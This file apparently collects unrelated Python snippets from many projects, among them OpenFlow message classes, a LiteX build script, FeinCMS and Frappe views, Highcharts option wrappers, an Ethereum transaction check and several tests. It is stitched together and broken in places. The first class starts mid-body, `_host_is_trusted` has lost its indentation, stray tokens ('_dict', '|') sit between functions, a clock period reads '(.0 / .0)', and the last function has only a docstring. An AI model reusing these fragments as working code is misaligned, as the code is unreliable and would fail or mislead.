            self.code = 0
        if (data != None):
            self.data = data
        else:
            self.data = ''
        return

    def pack(self):
        """Serialize to wire format; the length field is patched in afterwards."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # placeholder for total length
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.err_type))
        packed.append(struct.pack('!H', self.code))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    # Restored missing @staticmethod: unpack takes only `reader`, constructs a
    # fresh instance, and is invoked on the class by the message dispatcher.
    @staticmethod
    def unpack(reader):
        """Deserialize a message from `reader`; asserts the fixed header fields."""
        obj = queue_op_failed_error_msg()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 1)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Constrain further reads to this message's payload (header is 4 bytes).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _err_type = reader.read('!H')[0]
        assert (_err_type == 9)
        obj.code = reader.read('!H')[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.code != other.code):
            return False
        if (self.data != other.data):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable rendering of the message to pretty-printer `q`."""
        q.text('queue_op_failed_error_msg {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('code = ')
                value_name_map = {0: 'OFPQOFC_BAD_PORT', 1: 'OFPQOFC_BAD_QUEUE', 2: 'OFPQOFC_EPERM'}
                if (self.code in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.code], self.code)))
                else:
                    q.text(('%#x' % self.code))
                q.text(',')
                q.breakable()
                q.text('data = ')
                q.pp(self.data)
            q.breakable()
        q.text('}')
def parse_args(argv=sys.argv[1:], prog=sys.argv[0]):
    """Parse command-line options and return them as a dict.

    Bug fix: ``parser.parse_args()`` previously read ``sys.argv`` directly,
    silently ignoring the ``argv`` parameter, and ``prog`` was never used.

    :param argv: argument list to parse (defaults to the process arguments)
    :param prog: program name shown in usage/help output
    :return: dict with keys 'fmt', 'flip', 'sort', 'filename'
    """
    import argparse
    parser = argparse.ArgumentParser(prog=prog)
    formats = ['summary', 'pairs', 'singles', 'simple', 'flat', 'json', 'raw']
    parser.add_argument('--format', dest='fmt', choices=formats, default='summary')
    # Each format also gets a convenience flag, e.g. --json == --format json.
    for fmt in formats:
        parser.add_argument(f'--{fmt}', dest='fmt', action='store_const', const=fmt)
    parser.add_argument('--flip', action='count', default=0)
    parser.add_argument('--sort', choices=['count', 'op1', 'op2', 'raw'], default='count')
    parser.add_argument('filename', metavar='FILE')
    args = parser.parse_args(argv)
    # An even number of --flip flags cancels out.
    args.flip = bool(args.flip % 2)
    return vars(args)
def main():
    """Entry point: build the gateware, or (per argv) load a bitstream / simulate."""
    build_dir = 'gateware'
    platform = Platform(toolchain='vivado')
    design = Tuto(platform)
    if ('load' in sys.argv[1:]):
        # Flash a previously built bitstream instead of rebuilding.
        prog = platform.create_programmer()
        prog.load_bitstream((build_dir + '/top.bit'))
        exit()
    if ('sim' in sys.argv[1:]):
        ring = Blink(4)
        # NOTE(review): (.0 / .0) raises ZeroDivisionError at runtime -- this
        # clock period looks garbled; confirm the intended 'sys' clock value.
        run_simulation(ring, test(), clocks={'sys': (.0 / .0)}, vcd_name='sim.vcd')
        exit()
    platform.build(design, build_dir=build_dir)
class SectionContent(models.Model):
    """FeinCMS content type: a titled rich-text section with an optional media file."""

    feincms_item_editor_inline = SectionContentInline
    feincms_item_editor_context_processors = ((lambda x: settings.FEINCMS_RICHTEXT_INIT_CONTEXT),)
    feincms_item_editor_includes = {'head': [settings.FEINCMS_RICHTEXT_INIT_TEMPLATE]}

    title = models.CharField(_('title'), max_length=200, blank=True)
    richtext = RichTextField(_('text'), blank=True)
    mediafile = MediaFileForeignKey(MediaFile, on_delete=models.CASCADE, verbose_name=_('media file'), related_name='+', blank=True, null=True)

    class Meta:
        abstract = True
        verbose_name = _('section')
        verbose_name_plural = _('sections')

    # Restored missing @classmethod: the method takes `cls` and is invoked on
    # the content-type class by FeinCMS's create_content_type machinery.
    @classmethod
    def initialize_type(cls, TYPE_CHOICES=None, cleanse=None):
        """Add the 'type' field from TYPE_CHOICES and install an optional cleanser."""
        if ('feincms.module.medialibrary' not in django_settings.INSTALLED_APPS):
            raise ImproperlyConfigured(("You have to add 'feincms.module.medialibrary' to your INSTALLED_APPS before creating a %s" % cls.__name__))
        if (TYPE_CHOICES is None):
            raise ImproperlyConfigured(('You need to set TYPE_CHOICES when creating a %s' % cls.__name__))
        cls.add_to_class('type', models.CharField(_('type'), max_length=10, choices=TYPE_CHOICES, default=TYPE_CHOICES[0][0]))
        if cleanse:
            cls.cleanse = cleanse

    # Restored missing @classmethod (takes `cls`, called without an instance).
    @classmethod
    def get_queryset(cls, filter_args):
        return cls.objects.select_related('parent', 'mediafile').filter(filter_args)

    def render(self, **kwargs):
        """Pick the most specific template for (media type, section type)."""
        if self.mediafile:
            mediafile_type = self.mediafile.type
        else:
            mediafile_type = 'nomedia'
        return AutoRenderTuple(([f'content/section/{mediafile_type}_{self.type}.html', ('content/section/%s.html' % mediafile_type), ('content/section/%s.html' % self.type), 'content/section/default.html'], {'content': self}))

    def save(self, *args, **kwargs):
        """Run the configured cleanser over the rich text before saving."""
        if getattr(self, 'cleanse', None):
            try:
                self.richtext = self.cleanse(self.richtext)
            except TypeError:
                # Unbound-method style cleanser (legacy): call the raw function.
                self.richtext = self.cleanse.im_func(self.richtext)
        super().save(*args, **kwargs)
    save.alters_data = True
def idx_ranges(table, starts, ends, mode: str):
    """Yield ``(region_index, start_value, end_value)`` triples for the given bounds.

    With an empty table or no bounds at all, a single full-range triple
    ``(slice(None), None, None)`` is yielded. Otherwise the work is delegated
    to the nested-interval walker when both bound lists are non-empty and the
    table's ``end`` column is not monotonically increasing, and to the simple
    walker in every other case.
    """
    assert mode in ('inner', 'outer')

    if not len(table) or (starts is None and ends is None):
        yield (slice(None), None, None)
        return

    have_ends = ends is not None and len(ends)
    have_starts = starts is not None and len(starts)
    if have_ends and have_starts and not table.end.is_monotonic_increasing:
        walker = _irange_nested
    else:
        walker = _irange_simple

    for region_idx, start_val, end_val in walker(table, starts, ends, mode):
        yield (region_idx, start_val, end_val)
def extractXianxiaheavenWordpressCom(item):
    """Build a release message for 'Xianxia Heaven' wordpress feed items.

    Returns None for previews or items without a chapter/volume, a release
    message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None

    release_tags = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series_name, tl_type in release_tags:
        if tag in item['tags']:
            return buildReleaseMessageWithType(
                item, series_name, vol, chp,
                frag=frag, postfix=postfix, tl_type=tl_type,
            )
    return False
def test_mapping_saved_into_es_when_index_already_exists_closed(write_client):
    """Saving a mapping into an existing-but-closed index must succeed."""
    m = mapping.Mapping()
    keyword_analyzer = analysis.analyzer('my_analyzer', tokenizer='keyword')
    m.field('name', 'text', analyzer=keyword_analyzer)

    write_client.indices.create(index='test-mapping')

    # While the index is open, saving a mapping with a new analyzer is refused.
    with raises(exceptions.IllegalOperation):
        m.save('test-mapping', using=write_client)

    write_client.cluster.health(index='test-mapping', wait_for_status='yellow')
    write_client.indices.close(index='test-mapping')
    m.save('test-mapping', using=write_client)

    expected = {
        'test-mapping': {
            'mappings': {
                'properties': {'name': {'type': 'text', 'analyzer': 'my_analyzer'}}
            }
        }
    }
    assert expected == write_client.indices.get_mapping(index='test-mapping')
# Restored mangled decorator: the bare tuple expression above the function was
# a stripped `@mark.parametrize(...)` (bare `param(...)` implies
# `from pytest import mark, param` style imports in this file).
@mark.parametrize('override,expected,space_after_sep', [param('key=value', 'value', False, id='str'), param("key='value'", "'value'", False, id='single_quoted'), param('key="value"', '"value"', False, id='double_quoted'), param("key=''", "''", False, id='quoted_unicode'), param('key=\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,', '\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,', False, id='escaped_chars'), param('key=10', '10', False, id='int'), param('key=3.1415', '3.1415', False, id='float'), param('key=[]', '[]', False, id='list'), param('key=[1,2,3]', '[1,2,3]', False, id='list'), param('key=[1,2,3]', '[1, 2, 3]', True, id='list'), param("key=['a b', 2, 3]", "['a b',2,3]", False, id='list'), param("key=['a b', 2, 3]", "['a b', 2, 3]", True, id='list'), param('key={}', '{}', False, id='dict'), param('key={a:10}', '{a:10}', False, id='dict'), param('key={a:10}', '{a: 10}', True, id='dict'), param('key={a:10,b:20}', '{a:10,b:20}', False, id='dict'), param('key={a:10,b:20}', '{a: 10, b: 20}', True, id='dict'), param('key={a:10,b:[1,2,3]}', '{a: 10, b: [1, 2, 3]}', True, id='dict'), param(('key={%s: 1}' % UNQUOTED_SPECIAL), ('{%s: 1}' % UNQUOTED_SPECIAL.replace('\\', '\\\\')), True, id='dict_unquoted_key_special'), param('key={ white space\t: 2}', '{white\\ \\ space: 2}', True, id='dict_ws_in_key'), param('key={\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,: 2}', '{\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,: 2}', True, id='dict_esc_key')])
def test_override_get_value_element_method(override: str, expected: str, space_after_sep: bool) -> None:
    """An override's value element must round-trip through get_value_element_as_str."""
    ret = parse_rule(override, 'override')
    assert (ret.get_value_element_as_str(space_after_sep=space_after_sep) == expected)
def _host_is_trusted(hostname, trusted_list):
if (not hostname):
return False
if isinstance(trusted_list, str):
trusted_list = [trusted_list]
def _normalize(hostname):
if (':' in hostname):
hostname = hostname.rsplit(':', 1)[0]
return _encode_idna(hostname)
try:
hostname = _normalize(hostname)
except UnicodeError:
return False
for ref in trusted_list:
if ref.startswith('.'):
ref = ref[1:]
suffix_match = True
else:
suffix_match = False
try:
ref = _normalize(ref)
except UnicodeError:
return False
if (ref == hostname):
return True
if (suffix_match and hostname.endswith(('.' + ref))):
return True
return False |
def check_transaction(tx: Transaction, base_fee_per_gas: Uint, gas_available: Uint, chain_id: U64) -> Tuple[Address, Uint]:
    """Validate a transaction's gas/fee fields against the current block.

    Returns the recovered sender address and the effective gas price.
    Raises InvalidBlock (via ensure) when the transaction exceeds the
    remaining block gas or its fee fields are inconsistent with the base fee.
    """
    ensure(tx.gas <= gas_available, InvalidBlock)
    sender_address = recover_sender(chain_id, tx)

    if isinstance(tx, FeeMarketTransaction):
        # EIP-1559: the fee cap must cover both the tip and the base fee.
        ensure(tx.max_fee_per_gas >= tx.max_priority_fee_per_gas, InvalidBlock)
        ensure(tx.max_fee_per_gas >= base_fee_per_gas, InvalidBlock)
        priority_fee_per_gas = min(
            tx.max_priority_fee_per_gas,
            tx.max_fee_per_gas - base_fee_per_gas,
        )
        effective_gas_price = priority_fee_per_gas + base_fee_per_gas
    else:
        # Legacy transaction: the fixed gas price must at least cover base fee.
        ensure(tx.gas_price >= base_fee_per_gas, InvalidBlock)
        effective_gas_price = tx.gas_price

    return sender_address, effective_gas_price
def test_schema_expansion():
    """Expanding a schema list inlines named-type references into full definitions.

    (The original body began with a stray single quote -- a truncated
    docstring, which is a syntax error -- replaced with this docstring.)
    """
    sub_schema = {'name': 'Dependency', 'namespace': 'com.namespace.dependencies', 'type': 'record', 'fields': [{'name': 'sub_field_1', 'type': 'string'}]}
    outer_schema = {'name': 'MasterSchema', 'namespace': 'com.namespace.master', 'type': 'record', 'fields': [{'name': 'field_1', 'type': 'com.namespace.dependencies.Dependency'}]}
    combined = {'name': 'com.namespace.master.MasterSchema', 'type': 'record', 'fields': [{'name': 'field_1', 'type': {'name': 'com.namespace.dependencies.Dependency', 'type': 'record', 'fields': [{'name': 'sub_field_1', 'type': 'string'}]}}]}
    parsed = expand_schema([sub_schema, outer_schema])
    assert (parsed[1] == combined)
_dict
def __init__(self, *args, **kwds):
    """Auto-assign members named in ``_auto_init_`` from positional/keyword args.

    ``_auto_init_`` lists attribute names to assign in order; a leading
    'value' entry is skipped (presumably consumed by the enum machinery
    before this runs -- TODO confirm). Raises TypeError on surplus
    positionals, missing values, or unknown keywords.
    """
    _auto_init_ = self._auto_init_
    # No auto-init spec: nothing to assign.
    if (_auto_init_ is None):
        return
    if ('value' in _auto_init_):
        _auto_init_ = _auto_init_[1:]
    if _auto_init_:
        # More positional args than declared names is an error.
        if (len(_auto_init_) < len(args)):
            raise TypeError(('%d arguments expected (%s), %d received (%s)' % (len(_auto_init_), _auto_init_, len(args), args)))
        for (name, arg) in zip(_auto_init_, args):
            setattr(self, name, arg)
        if (len(args) < len(_auto_init_)):
            # Names not covered positionally must be supplied as keywords.
            remaining_args = _auto_init_[len(args):]
            for name in remaining_args:
                # `undefined` is a module-level sentinel distinguishing
                # "not passed" from an explicit None.
                value = kwds.pop(name, undefined)
                if (value is undefined):
                    raise TypeError(('missing value for: %r' % (name,)))
                setattr(self, name, value)
        if kwds:
            # Leftover keywords match no declared name.
            raise TypeError(('invalid keyword(s): %s' % ', '.join(kwds.keys())))
class OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping(Options):
    """Point-grouping options for venn series sonification instruments.

    Restored the missing ``@property`` / ``@<name>.setter`` decorators: each
    getter/setter pair shared a name, so without them the setter definition
    silently shadowed the getter.
    """

    @property
    def algorithm(self):
        """Grouping algorithm; defaults to 'minmax'."""
        return self._config_get('minmax')

    @algorithm.setter
    def algorithm(self, text: str):
        self._config(text, js_type=False)

    @property
    def enabled(self):
        """Whether point grouping is enabled; defaults to True."""
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def groupTimespan(self):
        """Timespan of each point group; defaults to 15."""
        return self._config_get(15)

    @groupTimespan.setter
    def groupTimespan(self, num: float):
        self._config(num, js_type=False)

    @property
    def prop(self):
        """Point property used for grouping; defaults to 'y'."""
        return self._config_get('y')

    @prop.setter
    def prop(self, text: str):
        self._config(text, js_type=False)
def convertInfsToZeros_ArrayFloat(pArray, pToEpsilon=False):
    """Replace NaN and +/-inf entries of ``pArray`` in place.

    Non-finite entries become 1e-06 when ``pToEpsilon`` is True, else 0.0.
    The (possibly modified) input array is returned.
    """
    if len(pArray) == 0:
        return pArray

    fill = 1e-06 if pToEpsilon else 0.0

    nan_idx = np.flatnonzero(np.isnan(pArray))
    if len(nan_idx):
        pArray[nan_idx] = fill

    inf_idx = np.flatnonzero(np.isinf(pArray))
    if len(inf_idx):
        pArray[inf_idx] = fill

    return pArray
def get_kibana_client(cloud_id, kibana_url, kibana_user, kibana_password, kibana_cookie, space, ignore_ssl_errors, provider_type, provider_name, **kwargs):
    """Build an authenticated Kibana client from CLI options.

    Authenticates with a session cookie when one is given, otherwise logs in
    with user/password (prompting for whichever is missing).
    """
    from requests import HTTPError
    from kibana import Kibana

    if not (cloud_id or kibana_url):
        client_error('Missing required --cloud-id or --kibana-url')

    if not kibana_cookie:
        # Fall back to interactive prompts for any credential not supplied.
        kibana_user = kibana_user or click.prompt('kibana_user')
        kibana_password = kibana_password or click.prompt('kibana_password', hide_input=True)

    with Kibana(cloud_id=cloud_id, kibana_url=kibana_url, space=space, verify=not ignore_ssl_errors, **kwargs) as kibana:
        if kibana_cookie:
            kibana.add_cookie(kibana_cookie)
            return kibana

        try:
            kibana.login(kibana_user, kibana_password, provider_type=provider_type, provider_name=provider_name)
        except HTTPError as exc:
            if exc.response.status_code == 401:
                err_msg = f'Authentication failed for {kibana_url}. If credentials are valid, check --provider-name'
                client_error(err_msg, exc, err=True)
            else:
                raise
        return kibana
def test_split_coordinate_derivative():
    """Splitting the (0, 0) block of a coordinate derivative keeps its signature."""
    mesh = UnitSquareMesh(1, 1)
    V = FunctionSpace(mesh, 'P', 1)
    Q = FunctionSpace(mesh, 'DP', 0)
    W = V * Q

    v = TestFunction(W)
    w = Function(W)
    x = SpatialCoordinate(mesh)

    full_jacobian = derivative(inner(v, w) * dx, x)
    block_00 = ExtractSubBlock().split(full_jacobian, (0, 0))

    # The extracted block must agree with differentiating the form restricted
    # to the first subspace directly.
    expected = derivative(inner(as_vector([TestFunction(V), 0]), w) * dx, x)
    assert block_00.signature() == expected.signature()
# Restored mangled decorator (a bare `()` line): this endpoint is exposed to
# the web client via frappe's whitelist mechanism.
@frappe.whitelist()
def get_discussions(filters=None, order_by=None, limit_start=None, limit_page_length=None):
    """Return discussions visible to the current user.

    Applies the virtual 'feed_type' (unread/following) and 'participator'
    filters, restricts private projects to team members and guests to their
    granted projects, and attaches any ongoing polls to each discussion.
    """
    if (not frappe.has_permission('GP Discussion', 'read')):
        frappe.throw('Insufficient Permission for GP Discussion', frappe.PermissionError)
    filters = (frappe.parse_json(filters) if filters else None)
    # 'feed_type' and 'participator' are virtual filters handled below, not
    # real Discussion columns -- pop them before building the query.
    feed_type = (filters.pop('feed_type', None) if filters else None)
    participator = (filters.pop('participator', None) if filters else None)
    order_by = (order_by or 'last_post_at desc')
    (order_field, order_direction) = order_by.split(' ', 1)
    Discussion = frappe.qb.DocType('GP Discussion')
    Visit = frappe.qb.DocType('GP Discussion Visit')
    Project = frappe.qb.DocType('GP Project')
    Team = frappe.qb.DocType('GP Team')
    Member = frappe.qb.DocType('GP Member')
    # Membership subquery: is the current user a member of the project's team?
    member_exists = frappe.qb.from_(Member).select(Member.name).where((Member.parenttype == 'GP Team')).where((Member.parent == Project.team)).where((Member.user == frappe.session.user))
    query = frappe.qb.from_(Discussion).select(Discussion.star, Visit.last_visit, Project.title.as_('project_title'), Team.title.as_('team_title')).left_join(Visit).on(((Discussion.name == Visit.discussion) & (Visit.user == frappe.session.user))).left_join(Project).on((Discussion.project == Project.name)).left_join(Team).on((Discussion.team == Team.name)).where(((Project.is_private == 0) | ((Project.is_private == 1) & ExistsCriterion(member_exists)))).limit(limit_page_length).offset((limit_start or 0))
    if filters:
        for key in filters:
            query = query.where((Discussion[key] == filters[key]))
        if filters.get('project'):
            # Within a project, pinned discussions come first.
            query = query.orderby(Discussion.pinned_at, order=frappe._dict(value='desc'))
    if participator:
        replies = frappe.db.get_all('GP Comment', fields=['reference_name'], filters={'reference_doctype': 'GP Discussion', 'owner': participator}, pluck='reference_name')
        if (not replies):
            return []
        replies = list(set(replies))
        query = query.where(Discussion.name.isin(replies))
    if (feed_type == 'unread'):
        # Unread = never visited, or new posts since the last visit.
        query = query.where(((Visit.last_visit < Discussion.last_post_at) | Visit.last_visit.isnull()))
    if (feed_type == 'following'):
        FollowedProject = frappe.qb.DocType('GP Followed Project')
        followed_projects = FollowedProject.select(FollowedProject.project).where((FollowedProject.user == frappe.session.user))
        query = query.where(Discussion.project.isin(followed_projects))
    query = query.orderby(Discussion[order_field], order=frappe._dict(value=order_direction))
    is_guest = gameplan.is_guest()
    if is_guest:
        # Guests only see projects they were explicitly granted access to.
        GuestAccess = frappe.qb.DocType('GP Guest Access')
        project_list = GuestAccess.select(GuestAccess.project).where((GuestAccess.user == frappe.session.user))
        query = query.where(Discussion.project.isin(project_list))
    discussions = query.run(as_dict=1)
    # Attach any still-running polls to their discussion rows.
    Poll = frappe.qb.DocType('GP Poll')
    discussion_names = [d.name for d in discussions]
    ongoing_polls = (frappe.qb.from_(Poll).select(Poll.name, Poll.owner, Poll.discussion).where((Poll.stopped_at.isnull() | (Poll.stopped_at > frappe.utils.now()))).where(Poll.discussion.isin(discussion_names)).orderby(Poll.creation, order=frappe._dict(value='asc')).run(as_dict=1) if discussion_names else [])
    for discussion in discussions:
        discussion['ongoing_polls'] = [p for p in ongoing_polls if (str(p.discussion) == str(discussion.name))]
    return discussions
def _replace_pats(ir, fwd, c, pat, repl, only_replace_attrs=True, use_sym_id=True):
    """Replace each match of ``pat`` within ``fwd(c)`` using callback ``repl``.

    ``fwd`` maps nodes into the current IR. Each successful replacement yields
    a forwarding function which is composed onto a running map, so later
    matches are first translated through all earlier replacements.
    Returns the (possibly updated) ``ir`` and the overall composed forward map.
    """
    cur_fwd = (lambda x: x)  # identity until the first replacement happens
    c = fwd(c)
    for rd in match_pattern(c, pat, use_sym_id=use_sym_id):
        # Translate this match through replacements done in earlier iterations.
        rd = cur_fwd(rd)
        # `repl` may decline a match by returning a falsy value.
        if (not (c_repl := repl(rd))):
            continue
        (ir, fwd_rd) = _replace_helper(rd, c_repl, only_replace_attrs)
        cur_fwd = _compose(fwd_rd, cur_fwd)
    return (ir, _compose(cur_fwd, fwd))
class DatasetNoReadAccessError(FoundryAPIError):
    """Raised when the caller lacks read access to a dataset."""

    def __init__(self, dataset_rid: str, response: (requests.Response | None) = None):
        # Append the server's response body (if any) after the summary line.
        details = response.text if response is not None else ''
        super().__init__(f'No read access to dataset {dataset_rid}.\n' + details)
        self.dataset_rid = dataset_rid
        self.response = response
class DataFormatSpec():
    """High-level view of a LIS Data Format Specification Record.

    Wraps the parsed ``attic`` object and exposes its entry-block values and
    channel specs as read-only properties.

    Restored the missing ``@property`` decorators on the accessor methods:
    the code itself reads them as attributes (e.g. ``self.depth_mode``,
    ``self.specs`` in ``index_mnem`` and ``self.spacing``/``self.direction``
    in ``directional_spacing``), which only works when they are properties.
    """

    def __init__(self, attic):
        self.attic = attic
        # Mnemonic reported for the index channel in depth-mode-1 records.
        self.default_index_mnem = 'DEPT'

    def __repr__(self):
        return 'DataFormatSpec()'

    @property
    def info(self):
        return self.attic.info

    @property
    def index_mnem(self):
        """Mnemonic of the index channel (None when there are no specs)."""
        nspecs = len(self.specs)
        if ((self.depth_mode == 0) and (nspecs == 0)):
            return None
        if ((self.depth_mode == 0) and (nspecs > 0)):
            # In mode 0 the first spec block is the index channel.
            return self.specs[0].mnemonic
        if (self.depth_mode == 1):
            return self.default_index_mnem

    @property
    def index_units(self):
        """Units of the index channel (None when there are no specs)."""
        nspecs = len(self.specs)
        if ((self.depth_mode == 0) and (nspecs == 0)):
            return None
        if ((self.depth_mode == 0) and (nspecs > 0)):
            return self.specs[0].units
        if (self.depth_mode == 1):
            return self.depth_units

    @property
    def sample_rates(self):
        """Distinct sample counts of the non-index channels."""
        # In mode 0 the first spec is the index channel; skip it.
        first = (1 if (self.depth_mode == 0) else 0)
        return {x.samples for x in self.specs[first:]}

    @property
    def specs(self):
        return self.attic.specs

    @property
    def entries(self):
        return self.attic.entries

    @property
    def absent_value(self):
        eb = core.lis_ebtype.absent_value
        return self.entry_value(eb, default=(- 999.25))

    @property
    def depth_mode(self):
        eb = core.lis_ebtype.depth_rec_mode
        return self.entry_value(eb, default=0)

    @property
    def depth_reprc(self):
        eb = core.lis_ebtype.reprc_output_depth
        return self.entry_value(eb)

    @property
    def depth_units(self):
        eb = core.lis_ebtype.units_of_depth
        return self.entry_value(eb, default='.1IN')

    @property
    def direction(self):
        eb = core.lis_ebtype.up_down_flag
        return self.entry_value(eb, default=1)

    @property
    def frame_size(self):
        eb = core.lis_ebtype.frame_size
        return self.entry_value(eb)

    @property
    def max_frames(self):
        eb = core.lis_ebtype.max_frames_pr_rec
        return self.entry_value(eb)

    @property
    def optical_log_depth_units(self):
        eb = core.lis_ebtype.depth_scale_units
        return self.entry_value(eb, default=1)

    @property
    def record_type(self):
        eb = core.lis_ebtype.data_rec_type
        return self.entry_value(eb, default=0)

    @property
    def reference_point(self):
        eb = core.lis_ebtype.ref_point
        return self.entry_value(eb)

    @property
    def reference_point_units(self):
        eb = core.lis_ebtype.ref_point_units
        return self.entry_value(eb, default='.1IN')

    @property
    def spacing(self):
        eb = core.lis_ebtype.spacing
        return self.entry_value(eb)

    @property
    def spacing_units(self):
        eb = core.lis_ebtype.spacing_units
        return self.entry_value(eb, default='.1IN')

    @property
    def spec_block_type(self):
        eb = core.lis_ebtype.data_rec_type
        return self.entry_value(eb, default=0)

    @property
    def spec_block_subtype(self):
        eb = core.lis_ebtype.spec_bloc_subtype
        return self.entry_value(eb, default=0)

    @property
    def directional_spacing(self):
        """Spacing signed by logging direction (negative when logging up)."""
        if (self.spacing is None):
            raise ValueError('No spacing recorded')
        if (self.direction == 1):
            return (- self.spacing)
        if (self.direction == 255):
            return self.spacing
        msg = 'Invalid direction (UP/DOWN flag). was: {}'
        raise ValueError(msg.format(self.direction))

    def entry_value(self, entry_type, default=None):
        """Value of the entry block of ``entry_type``, or ``default`` if absent."""
        entry = self.find_entry(entry_type)
        return (entry.value if (not (entry is None)) else default)

    def find_entry(self, entry_type):
        """The unique entry block of ``entry_type``, or None; raises on duplicates."""
        entry = [x for x in self.attic.entries if (x.type == int(entry_type))]
        if (len(entry) == 0):
            return None
        elif (len(entry) == 1):
            return entry[0]
        msg = 'Multiple Entry Blocks of type {}'
        raise ValueError(msg.format(entry_type))
# Restored mangled decorator (a bare `(tags=..., description=...)` line):
# flask-apispec's @doc supplies swagger metadata for the resource.
@doc(tags=['receipts'], description=docs.EFILING_TAG)
class ScheduleAEfileView(views.ApiResource):
    """Itemized Schedule A receipts sourced from raw electronic filings."""

    model = models.ScheduleAEfile
    schema = schemas.ItemizedScheduleAfilingsSchema
    page_schema = schemas.ScheduleAEfilePageSchema

    filter_multi_fields = [('image_number', models.ScheduleAEfile.image_number), ('committee_id', models.ScheduleAEfile.committee_id), ('contributor_city', models.ScheduleAEfile.contributor_city), ('contributor_state', models.ScheduleAEfile.contributor_state)]
    filter_range_fields = [(('min_date', 'max_date'), models.ScheduleAEfile.contribution_receipt_date), (('min_amount', 'max_amount'), models.ScheduleAEfile.contribution_receipt_amount), (('min_image_number', 'max_image_number'), models.ScheduleAEfile.image_number)]
    filter_fulltext_fields = [('contributor_name', models.ScheduleAEfile.contributor_name_text), ('contributor_employer', models.ScheduleAEfile.contributor_employer_text), ('contributor_occupation', models.ScheduleAEfile.contributor_occupation_text)]

    # Restored missing @property: the resource machinery reads `self.args`
    # as an attribute, not as a method call.
    @property
    def args(self):
        """Request-argument schema: paging, filters and sort validation."""
        return utils.extend(args.paging, args.schedule_a_e_file, args.itemized, args.make_sort_args(default='-contribution_receipt_date', validator=args.OptionValidator(['contribution_receipt_date', 'contribution_receipt_amount'])))
def generate_verify_code(*, length: int=settings.email_verification_code_length, secret: str=settings.secret.get_secret_value()) -> tuple[str, str]:
    """Generate a random verification code plus its keyed hash.

    Returns a ``(code, hash)`` pair; the code is ``length`` characters drawn
    from uppercase letters and digits using a cryptographic RNG.
    """
    alphabet = string.ascii_uppercase + string.digits
    code = ''.join(secrets.choice(alphabet) for _ in range(length))
    return code, get_verify_code_hash(code, secret=secret)
class TestInitializer(TestCase):
    """Tests for Request construction argument validation."""

    def test_request_type(self):
        # Wrapping an already-wrapped Request must fail with a clear
        # AssertionError rather than silently double-wrapping.
        request = Request(factory.get('/'))
        # NOTE(review): this expected message looks truncated/garbled
        # ('`django.' ...) — confirm against the framework's actual text.
        message = 'The `request` argument must be an instance of `django. not `rest_framework.request.Request`.'
        with self.assertRaisesMessage(AssertionError, message):
            Request(request)
class OptionPlotoptionsXrangeSonificationContexttracksPointgrouping(Options):
    """Generated Highcharts option wrapper for sonification point grouping.

    Each option appears as a getter/setter pair sharing one name.
    NOTE(review): as written the later def shadows the earlier one — the
    @property / @<name>.setter decorators appear to have been stripped
    from this extract. TODO confirm against the generator's output.
    """

    def algorithm(self):
        # Default grouping algorithm: 'minmax'.
        return self._config_get('minmax')

    def algorithm(self, text: str):
        self._config(text, js_type=False)

    def enabled(self):
        # Grouping enabled by default.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def groupTimespan(self):
        # Default grouping window (ms) is 15.
        return self._config_get(15)

    def groupTimespan(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        # Default point property to group on: 'y'.
        return self._config_get('y')

    def prop(self, text: str):
        self._config(text, js_type=False)
class Strategy(Protocol, Generic[(models.UP, models.ID)]):
    """Structural (duck-typed) interface for authentication token strategies."""

    async def read_token(self, token: Optional[str], user_manager: BaseUserManager[(models.UP, models.ID)]) -> Optional[models.UP]:
        """Resolve *token* to a user via *user_manager*; None when invalid or absent."""
        ...

    async def write_token(self, user: models.UP) -> str:
        """Create and return a new token for *user*."""
        ...

    async def destroy_token(self, token: str, user: models.UP) -> None:
        """Invalidate *token* belonging to *user*."""
        ...
class CustomFormatter(logging.Formatter):
    """Log formatter that colours each record by level via ANSI escape codes."""

    grey = '\x1b[38;20m'
    green = '\x1b[1;32m'
    yellow = '\x1b[33;20m'
    red = '\x1b[31;20m'
    bold_red = '\x1b[31;1m'
    reset = '\x1b[0m'
    # Shared "LEVEL - message" layout used by the problem levels.
    format_problem_str = '%(levelname)s - %(message)s'
    # Per-level format strings: INFO colours only the level name, the
    # problem levels (WARNING/ERROR/CRITICAL) colour the whole line.
    FORMATS = {
        logging.DEBUG: grey + '%(levelname)s - %(message)s' + reset,
        logging.INFO: green + '%(levelname)s' + reset + ' - %(message)s',
        logging.WARNING: yellow + format_problem_str + reset,
        logging.ERROR: red + format_problem_str + reset,
        logging.CRITICAL: bold_red + format_problem_str + reset,
    }

    def format(self, record: logging.LogRecord) -> str:
        """Format *record* using the colour scheme for its level."""
        per_level = logging.Formatter(self.FORMATS.get(record.levelno))
        return per_level.format(record)
def get_db_engine(connection_string: str) -> Engine:
    """Create a SQLAlchemy engine and verify connectivity with a probe query.

    Raises a chained Exception when engine creation fails or when the
    'SELECT 1' test query cannot be executed.
    """
